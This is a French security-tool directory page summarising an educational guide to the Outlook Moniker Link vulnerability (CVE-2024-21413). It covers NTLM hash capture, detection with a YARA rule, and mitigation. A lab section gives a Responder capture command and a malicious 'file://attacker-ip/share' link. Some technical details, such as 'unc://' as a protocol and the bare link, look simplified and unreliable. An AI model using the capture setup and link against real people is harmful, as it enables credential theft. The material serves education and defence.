Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Moniker-Link--CVE-2024-21413- — Guide éducatif sur CVE-2024-21413, la vulnérabilité Outlook zero-click Moniker Link, couvrant le flux d'attaque, la capture d'identifiants NTLM, la détection avec YARA et les stratégies d'atténuation. | Kitploit
Outils/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
Cassage de Mots de PasseOutils de PhishingAnalyse des VulnérabilitésExploitationÉvasion IDS/IPSMouvement LatéralTests d'IntrusionApprentissage et ÉducationRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Sécurité des Emails
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

Guide éducatif sur CVE-2024-21413, la vulnérabilité Outlook zero-click Moniker Link, couvrant le flux d'attaque, la capture d'identifiants NTLM, la détection avec YARA et les stratégies d'atténuation.

Voir le dépôt
17il y a 5 moisPas encore vérifié

🔗 Lien Moniker (CVE-2024-21413) — Guide pratique de la vulnérabilité Zero-Click d'Outlook


📌 1. Introduction

CVE-2024-21413, communément appelée la vulnérabilité du lien Moniker, est une faille de sécurité critique dans Microsoft Outlook qui permet aux attaquants de divulguer les identifiants utilisateur sans nécessiter aucune interaction.

Contrairement aux attaques de phishing traditionnelles, cette vulnérabilité peut être déclenchée simplement en prévisualisant un courriel, ce qui la rend particulièrement dangereuse dans les environnements professionnels.

Le problème provient de la façon dont Outlook traite les liens moniker, provoquant des tentatives d'authentification involontaires vers des systèmes contrôlés par l'attaquant.


🧠 2. Concepts Clés

Il est essentiel de comprendre les concepts suivants :

🔹 Lien Moniker

Un mécanisme spécifique à Windows qui permet aux applications de référencer des ressources externes en utilisant des protocoles tels que :

  • file://
  • unc://

🔹 Authentification NTLM

  • Un protocole d'authentification Windows hérité
  • Envoie automatiquement des identifiants hachés lors de l'accès à des ressources distantes
  • Susceptible aux attaques de capture et de relais d'identifiants

🔹 Chemin UNC (Universal Naming Convention)

\\attacker-server\share

Utilisé pour accéder aux ressources partagées sur un réseau. Dans cette vulnérabilité, il est abusé pour forcer les demandes d'authentification.

🔹 Contournement de la Vue Protégée

La Vue Protégée d'Outlook est conçue pour isoler les contenus potentiellement dangereux. Cette vulnérabilité contourne cette protection, permettant l'accès à des ressources externes.


⚙️ 3. Comment ça marche

Déroulement de l'attaque (Étape par étape)

  1. Création de la charge utile

    • L'attaquant intègre un lien moniker malveillant (par exemple, file://attacker-server/share) dans un courriel.
  2. Livraison

    • Le courriel est envoyé à la victime.
  3. Déclenchement

    • La victime prévisualise ou ouvre le courriel dans Outlook.
  4. Traitement automatique

    • Outlook traite le lien sans interaction de l'utilisateur.
  5. Demande d'authentification

    • Windows tente une authentification NTLM vers le serveur de l'attaquant.
  6. Exposition des identifiants

    • L'attaquant capture le haché NTLM.

Schéma du déroulement de l'attaque

[Attaquant]
    |
    | 1. Envoyer un courriel conçu
    v
[Outlook de la victime]
    |
    | 2. Traiter automatiquement le lien moniker
    v
[Système Windows]
    |
    | 3. Tentative d'authentification NTLM
    v
[Serveur de l'attaquant]
    |
    | 4. Capture du haché NTLM
    v
[Abus d'identifiants / Mouvement latéral]

🌍 4. Impact dans le monde réel

Scénarios d'attaque courants

  • Campagnes de phishing ciblées contre des organisations
  • Récolte d'identifiants dans les réseaux d'entreprise
  • Accès initial pour un mouvement latéral

Objectifs de l'attaquant

  • Capturer les hachés NTLM
  • Relayer l'authentification vers des services internes
  • Élévation de privilèges au sein du réseau

🛠️ 5. Outils et technologies

Outils offensifs / de recherche

  • Responder — Capture les hachés d'authentification NTLM
  • Impacket — Boîte à outils d'exploitation réseau
  • ntlmrelayx.py — Effectue des attaques de relais NTLM

Outils défensifs

  • Microsoft Defender — Détection et réponse sur les points de terminaison
  • Wireshark — Inspection du trafic réseau
  • Sysmon — Journalisation avancée des événements système

💻 6. Exemple pratique (Environnement de laboratoire uniquement)

⚠️ Effectuer uniquement dans des environnements de laboratoire contrôlés

Démarrer le service de capture NTLM

sudo responder -I eth0

Exemple de lien malveillant

<a href="file://attacker-ip/share">Open Document</a>

Résultat attendu

[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. Détection (Règle YARA)

Une règle de détection a été développée par Florian Roth pour identifier les tentatives d'exploitation impliquant des liens moniker.

Exemple de règle YARA

rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

Cas d'utilisation de la détection

  • Analyse de la passerelle de messagerie
  • Génération d'alertes SIEM
  • Chasse aux menaces pour les liens suspects

🛡️ 8. Atténuation et bonnes pratiques

Gestion des correctifs

  • Appliquer immédiatement les mises à jour de sécurité fournies par Microsoft

Renforcement de l'authentification

  • Désactiver NTLM lorsque possible
  • Appliquer l'authentification Kerberos

Contrôles réseau

  • Bloquer le SMB sortant (TCP 445) vers les réseaux externes
  • Restreindre les connexions sortantes inutiles

Sécurité des courriels

  • Filtrer ou assainir les liens file:// et basés sur UNC
  • Utiliser des solutions avancées de protection contre les menaces par courriel

Surveillance et détection

  • Surveiller les tentatives d'authentification sortantes
  • Journaliser et alerter sur le trafic SMB inhabituel

⚠️ 9. Erreurs courantes

  • Supposer qu'une interaction de l'utilisateur est nécessaire
  • Ignorer les risques liés à NTLM dans les environnements modernes
  • Se fier uniquement à l'antivirus sans contrôles réseau
  • Retarder le déploiement des correctifs

🧾 10. Conclusion

CVE-2024-21413 démontre comment des comportements système profondément intégrés (comme l'authentification automatique) peuvent être exploités via des entrées apparemment inoffensives telles que des liens de courriel.

Points clés à retenir

  • Vulnérabilité Zero-Click — aucune interaction utilisateur requise
  • Exploite la gestion des liens moniker par Outlook
  • Entraîne une fuite d'identifiants NTLM
  • Détectable à l'aide de YARA et de la surveillance réseau
  • Prévenable via des correctifs et une configuration appropriée

📚 11. Lectures complémentaires

  • Microsoft Security Advisory — CVE-2024-21413
  • Impacket Documentation (NTLM Relay Attacks)
  • YARA Documentation
  • OWASP Authentication Cheat Sheet

💡 Recommandation : Reproduisez cette vulnérabilité dans un laboratoire virtuel (par exemple, VM Windows + VM attaquant) pour comprendre pleinement la chaîne d'attaque et les stratégies défensives.

Télécharger l’outil